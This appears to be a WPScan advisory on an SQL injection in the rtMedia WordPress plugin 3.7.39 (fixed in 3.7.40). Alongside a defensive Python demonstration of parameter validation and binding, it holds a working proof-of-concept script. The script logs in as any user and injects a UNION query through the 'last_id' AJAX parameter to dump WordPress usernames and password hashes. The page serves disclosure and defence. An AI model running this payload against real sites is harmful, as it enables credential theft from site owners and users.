rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection



Description
When initialized, rtMedia includes and instantiates certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php’, line 110, if the class ‘BuddyPress’ is available.

Once instantiated, the RTMediaActivityUpgrade class registers an AJAX action called ‘rtmedia_activity_upgrade’. This AJAX action is callable by any registered (authenticated) user, and its ‘last_id’ parameter is used unsanitized in a query, making it susceptible to MySQL injection.
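The flaw described above is the classic pattern of splicing a request parameter into a query string. The following added example (it is not code from the plugin or from the advisory) reproduces that pattern against a constructed SQLite stand-in for the plugin's media table, and places the hardened form beside it: the parameter is validated as a non-negative integer (the equivalent of WordPress's absint()) and bound as a query parameter, so a non-numeric ‘last_id’ is rejected before any SQL runs. Table layout, column names and the row data are assumptions made for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for the plugin's media table; the real schema is not reproduced here.
ROWS = [(1, "photo"), (2, "video"), (3, "photo"), (4, "music")]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rt_rtm_media (id INTEGER PRIMARY KEY, media_type TEXT)")
    conn.executemany("INSERT INTO rt_rtm_media VALUES (?, ?)", ROWS)
    return conn


def fetch_after_vulnerable(conn, raw_last_id):
    """The flawed pattern: the untrusted parameter is spliced straight into the SQL text."""
    sql = "SELECT id FROM rt_rtm_media WHERE id > %s ORDER BY id" % raw_last_id
    return [row[0] for row in conn.execute(sql)]


def parse_last_id(raw_last_id):
    """Reject anything that is not a plain non-negative integer (mirrors absint())."""
    if not isinstance(raw_last_id, str) or re.fullmatch(r"[0-9]+", raw_last_id) is None:
        raise ValueError("last_id must be a non-negative integer")
    return int(raw_last_id)


def fetch_after_safe(conn, raw_last_id):
    """The hardened pattern: validate the type, then bind the value as a query parameter."""
    last_id = parse_last_id(raw_last_id)
    sql = "SELECT id FROM rt_rtm_media WHERE id > ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (last_id,))]


if __name__ == "__main__":
    db = make_db()
    # A well-formed request behaves identically in both versions.
    print("vulnerable, last_id=2:", fetch_after_vulnerable(db, "2"))
    print("safe,       last_id=2:", fetch_after_safe(db, "2"))
    # A tautology changes the WHERE clause in the flawed version; the hardened one refuses it.
    print("vulnerable, injected :", fetch_after_vulnerable(db, "0 OR 1=1"))
    try:
        fetch_after_safe(db, "0 OR 1=1")
    except ValueError as err:
        print("safe,       injected : rejected ->", err)
```

The same two-step defence (type validation plus a prepared statement such as $wpdb->prepare() with a %d placeholder) is what a WordPress handler for this action needs; validation alone is not enough for string parameters, and a prepared statement alone does not stop an attacker from supplying an unexpected type.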
Proof of Concept
import json
import requests

# Session keeps the WordPress login cookie for the second request.
s = requests.session()
target = 'http://localhost'

# Step 1: log in as any registered user (the action is not restricted to administrators).
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Step 2: call the vulnerable AJAX action with the injected 'last_id' parameter.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "rtmedia_activity_upgrade",
    "last_id": "0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

# The JSON response echoes the injected column back in 'activity_id'.
print(json.loads(r.text)['activity_id'])

Affects Plugin

fixed in version 3.7.40

References

URL https://research.g0blin.co.uk/g0blin-00046/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 702
Verified No
WPVDB ID 7950

Timeline

Publicly Published 2015-04-28 (over 3 years ago)
Added 2015-04-28 (over 3 years ago)
Last Updated 2015-05-15 (over 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.